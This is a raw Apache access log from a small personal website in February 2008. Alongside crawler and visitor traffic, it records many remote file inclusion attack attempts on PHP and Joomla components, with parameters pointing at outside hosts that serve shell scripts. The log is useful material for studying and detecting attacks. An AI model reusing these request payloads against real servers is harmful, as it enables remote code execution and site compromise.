203.186.158.77 - - [26/Feb/2008:07:08:40 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rafb.net/p/6zKkS734.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:08:46 -0800] "GET /logs/access.log//update/update2.php?lang=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:08:46 -0800] "GET //update/update2.php?lang=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:08:47 -0800] "GET /logs//update/update2.php?lang=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:09:07 -0800] "GET /retreat1/webcam/retreat1_00467.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:09:29 -0800] "GET /retreat1/webcam/retreat1_00046.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:07:09:37 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:07:09:38 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:07:09:38 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:09:56 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:10:15 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.1" 200 2297833 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:10:30 -0800] "GET /retreat1/webcam/retreat1_00560.jpg HTTP/1.0" 200 50735 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.26.108 - - [26/Feb/2008:07:10:38 -0800] "GET /minamijewelry/?N=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:10:50 -0800] "GET /retreat1/webcam/retreat1_00236.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:07:10:59 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:07:11:17 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:11:54 -0800] "GET /retreat1/webcam/retreat1_00161.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:11:59 -0800] "GET /retreat1/webcam/retreat1_00708.jpg HTTP/1.0" 200 47894 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:07:12:10 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.0.11 - - [26/Feb/2008:07:12:21 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.97.0.11 - - [26/Feb/2008:07:12:21 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:07:12:54 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:13:00 -0800] "GET /retreat1/webcam/retreat1_00254.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
70.87.175.3 - - [26/Feb/2008:07:13:21 -0800] "GET /logs/access_080131.log/modules/My_eGallery/index.php?basepath=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [26/Feb/2008:07:13:21 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [26/Feb/2008:07:13:21 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:13:28 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:13:45 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.1" 200 1814141 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:14:07 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:14:25 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:14:28 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
138.162.0.42 - - [26/Feb/2008:07:15:08 -0800] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.0" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353&page=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:07:15:19 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:07:15:26 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:07:15:26 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:15:32 -0800] "GET /retreat1/webcam/retreat1_00480.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:15:51 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:15:51 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:15:51 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:15:57 -0800] "GET /retreat1/webcam/retreat1_00288.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:15:57 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.204.230.31 - - [26/Feb/2008:07:16:07 -0800] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.204.230.31 - - [26/Feb/2008:07:16:07 -0800] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:16:10 -0800] "GET /retreat1/webcam/retreat1_00832.jpg HTTP/1.0" 200 50881 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:16:36 -0800] "GET /retreat1/webcam/retreat1_00518.jpg HTTP/1.0" 200 37021 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:16:49 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:16:49 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:16:49 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:16:51 -0800] "GET /SQuery/lib/gore.php?libpath=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:16:51 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:16:54 -0800] "GET /retreat1/webcam/retreat1_00903.jpg HTTP/1.0" 200 17346 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:07:16:55 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:07:16:56 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:17:02 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:17:13 -0800] "GET /retreat1/webcam/retreat1_00499.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:17:26 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:17:26 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:17:34 -0800] "GET /retreat1/webcam/retreat1_00525.jpg HTTP/1.0" 200 46198 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:07:18:10 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:07:18:13 -0800] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:07:18:16 -0800] "GET /logs/access_080131.log/index2.php?p=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:07:18:20 -0800] "GET /index2.php?p=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:07:18:20 -0800] "GET /logs/index2.php?p=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:07:18:21 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:07:18:21 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:18:55 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.1" 200 2297833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:19:13 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:19:13 -0800] "GET //skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:19:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:19:32 -0800] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.1" 200 875475 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:07:19:34 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:07:19:40 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:07:19:40 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:07:19:49 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:07:19:51 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.1" 200 1814141 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:20:31 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:07:20:38 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:21:09 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [26/Feb/2008:07:21:30 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [26/Feb/2008:07:21:31 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [26/Feb/2008:07:21:31 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.214.234 - - [26/Feb/2008:07:21:36 -0800] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:21:53 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:07:22:15 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:07:22:15 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:07:23:04 -0800] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:07:23:05 -0800] "GET /logs/access_071231.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:07:23:17 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.194.79.1 - - [26/Feb/2008:07:23:27 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:23:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:23:47 -0800] "GET //skin/zero_vote/error.php?dir=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.94.120.198 - - [26/Feb/2008:07:24:45 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:07:26:21 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:26:33 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [26/Feb/2008:07:26:37 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:27:25 -0800] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:27:25 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:27:25 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:07:27:50 -0800] "GET /minamijewelry/?N=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:28:23 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:28:23 -0800] "GET //skin/zero_vote/error.php?dir=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:28:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.204.230.31 - - [26/Feb/2008:07:29:16 -0800] "GET //components/com_extcalendar/extcalendar.php?&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
212.204.230.31 - - [26/Feb/2008:07:29:17 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:07:29:21 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
